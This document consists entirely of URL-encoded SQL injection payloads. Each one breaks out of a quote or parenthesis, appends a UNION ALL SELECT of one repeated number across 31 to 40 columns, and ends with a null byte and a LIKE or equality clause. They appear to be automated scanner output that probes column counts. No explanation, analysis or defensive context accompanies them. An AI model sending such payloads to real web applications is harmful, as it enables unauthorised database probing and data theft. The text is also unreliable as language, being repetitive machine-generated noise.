-8698%27%29%20UNION%20ALL%20SELECT%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%00%20AND%20%28%27TTJm%27%20LIKE%20%27TTJm -9000%27%29%20UNION%20ALL%20SELECT%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%2C%206083%00%20AND%20%28%27FoSv%27%20LIKE%20%27FoSv -1887%27%29%20UNION%20ALL%20SELECT%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%00%20AND%20%28%27ZGPF%27%20LIKE%20%27ZGPF -2203%27%29%20UNION%20ALL%20SELECT%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%2C%209451%00%20AND%20%28%27ybCG%27%20LIKE%20%27ybCG -2058%27%29%20UNION%20ALL%20SELECT%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%2C%201252%00%20AND%20%28%27uCdv%27%20LIKE%20%27uCdv -2571%27%29%29%20UNION%20ALL%20SELECT%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%2C%208620%00%20AND%20%28%28%27Pxei%27%20LIKE%20%27Pxei -5358%27%29%29%20UNION%20ALL%20SELECT%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%2C%208682%00%20AND%20%28%28%27IxSJ%27%20LIKE%20%27IxSJ -7468%27%29%29%20UNION%20ALL%20SELECT%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%2C%208998%00%20AND%20%28%28%27iWlm%27%20LIKE%20%27iWlm -3100%27%29%29%20UNION%20ALL%20SELECT%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%00%20AND%20%28%28%27ZrOO%27%20LIKE%20%27ZrOO -8804%27%29%29%20UNION%20ALL%20SELECT%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%2C%202315%00%20AND%20%28%28%27yAYM%27%20LIKE%20%27yAYM -2054%27%29%29%20UNION%20ALL%20SELECT%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%2C%206281%00%20AND%20%28%28%27TcdZ%27%20LIKE%20%27TcdZ -1298%27%29%29%20UNION%20ALL%20SELECT%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%2C%207433%00%20AND%20%28%28%27IfiC%27%20LIKE%20%27IfiC -6490%27%29%29%20UNION%20ALL%20SELECT%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%2C%204695%00%20AND%20%28%28%27eNPq%27%20LIKE%20%27eNPq -9039%27%29%29%20UNION%20ALL%20SELECT%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%2C%207936%00%20AND%20%28%28%27IbcA%27%20LIKE%20%27IbcA -6728%27%29%29%20UNION%20ALL%20SELECT%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%2C%202700%00%20AND%20%28%28%27UiVi%27%20LIKE%20%27UiVi -9236%27%29%29%29%20UNION%20ALL%20SELECT%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%2C%207161%00%20AND%20%28%28%28%27SOmo%27%20LIKE%20%27SOmo -7550%27%29%29%29%20UNION%20ALL%20SELECT%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%2C%208866%00%20AND%20%28%28%28%27gnOv%27%20LIKE%20%27gnOv -3593%27%29%29%29%20UNION%20ALL%20SELECT%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%2C%208676%00%20AND%20%28%28%28%27DbYp%27%20LIKE%20%27DbYp -1766%27%29%29%29%20UNION%20ALL%20SELECT%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%2C%207180%00%20AND%20%28%28%28%27ijag%27%20LIKE%20%27ijag -2938%27%29%29%29%20UNION%20ALL%20SELECT%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%2C%209344%00%20AND%20%28%28%28%27herc%27%20LIKE%20%27herc -6556%27%29%29%29%20UNION%20ALL%20SELECT%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%2C%203358%00%20AND%20%28%28%28%27azep%27%20LIKE%20%27azep -5025%27%29%29%29%20UNION%20ALL%20SELECT%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%2C%208903%00%20AND%20%28%28%28%27hPCy%27%20LIKE%20%27hPCy -9888%27%29%29%29%20UNION%20ALL%20SELECT%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%2C%208414%00%20AND%20%28%28%28%27XXtC%27%20LIKE%20%27XXtC -5939%27%29%29%29%20UNION%20ALL%20SELECT%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%2C%201051%00%20AND%20%28%28%28%27uahc%27%20LIKE%20%27uahc -2594%27%29%29%29%20UNION%20ALL%20SELECT%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%2C%207723%00%20AND%20%28%28%28%27EchH%27%20LIKE%20%27EchH -7088%27%20UNION%20ALL%20SELECT%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%2C%203773%00%20AND%20%27kIQf%27%20LIKE%20%27kIQf -2392%27%20UNION%20ALL%20SELECT%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%2C%201709%00%20AND%20%27yWYk%27%20LIKE%20%27yWYk -8663%27%20UNION%20ALL%20SELECT%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%2C%203534%00%20AND%20%27HwiU%27%20LIKE%20%27HwiU -2502%27%20UNION%20ALL%20SELECT%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%2C%207484%00%20AND%20%27pMKf%27%20LIKE%20%27pMKf -6495%27%20UNION%20ALL%20SELECT%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%2C%206501%00%20AND%20%27fIVJ%27%20LIKE%20%27fIVJ -5275%27%20UNION%20ALL%20SELECT%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%2C%205523%00%20AND%20%27JvMA%27%20LIKE%20%27JvMA -8829%27%20UNION%20ALL%20SELECT%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%2C%209729%00%20AND%20%27MRcL%27%20LIKE%20%27MRcL -8282%27%20UNION%20ALL%20SELECT%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%2C%204214%00%20AND%20%27RtWE%27%20LIKE%20%27RtWE -7087%27%20UNION%20ALL%20SELECT%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%2C%209110%00%20AND%20%27tMcA%27%20LIKE%20%27tMcA -1419%27%20UNION%20ALL%20SELECT%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%2C%203700%00%20AND%20%27Dqmv%27%20LIKE%20%27Dqmv -4689%22%29%20UNION%20ALL%20SELECT%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%2C%209041%00%20AND%20%28%22MvoE%22%3D%22MvoE -2645%22%29%20UNION%20ALL%20SELECT%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%2C%205495%00%20AND%20%28%22hKFt%22%3D%22hKFt -8730%22%29%20UNION%20ALL%20SELECT%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%2C%206441%00%20AND%20%28%22cxTk%22%3D%22cxTk -6862%22%29%20UNION%20ALL%20SELECT%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%2C%204665%00%20AND%20%28%22flXM%22%3D%22flXM -3267%22%29%20UNION%20ALL%20SELECT%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%2C%204226%00%20AND%20%28%22dGtZ%22%3D%22dGtZ -9298%22%29%20UNION%20ALL%20SELECT%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%2C%209552%00%20AND%20%28%22Qstr%22%3D%22Qstr -1487%22%29%20UNION%20ALL%20SELECT%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%2C%208107%00%20AND%20%28%22VbOO%22%3D%22VbOO -4618%22%29%20UNION%20ALL%20SELECT%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%2C%203646%00%20AND%20%28%22hBaD%22%3D%22hBaD -3617%22%29%20UNION%20ALL%20SELECT%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%2C%203563%00%20AND%20%28%22owzp%22%3D%22owzp -6636%22%29%20UNION%20ALL%20SELECT%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%2C%209532%00%20AND%20%28%22lLJd%22%3D%22lLJd -5541%22%29%29%20UNION%20ALL%20SELECT%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%2C%201290%00%20AND%20%28%28%22XHeZ%22%3D%22XHeZ -2957%22%29%29%20UNION%20ALL%20SELECT%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%2C%204280%00%20AND%20%28%28%22IiNG%22%3D%22IiNG -5733%22%29%29%20UNION%20ALL%20SELECT%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%2C%207158%00%20AND%20%28%28%22FhIn%22%3D%22FhIn -4164%22%29%29%20UNION%20ALL%20SELECT%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%2C%205117%00%20AND%20%28%28%22MWAb%22%3D%22MWAb -2783%22%29%29%20UNION%20ALL%20SELECT%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%2C%207244%00%20AND%20%28%28%22lozN%22%3D%22lozN -8121%22%29%29%20UNION%20ALL%20SELECT%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%2C%203857%00%20AND%20%28%28%22VBpK%22%3D%22VBpK -1609%22%29%29%20UNION%20ALL%20SELECT%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%2C%206443%00%20AND%20%28%28%22SVIP%22%3D%22SVIP -3078%22%29%29%20UNION%20ALL%20SELECT%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%2C%205291%00%20AND%20%28%28%22LiuL%22%3D%22LiuL -1936%22%29%29%20UNION%20ALL%20SELECT%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%2C%208790%00%20AND%20%28%28%22zhNj%22%3D%22zhNj -3640%22%29%29%20UNION%20ALL%20SELECT%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%2C%206298%00%20AND%20%28%28%22ddyR%22%3D%22ddyR -3324%22%29%29%29%20UNION%20ALL%20SELECT%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%2C%202943%00%20AND%20%28%28%28%22qTer%22%3D%22qTer 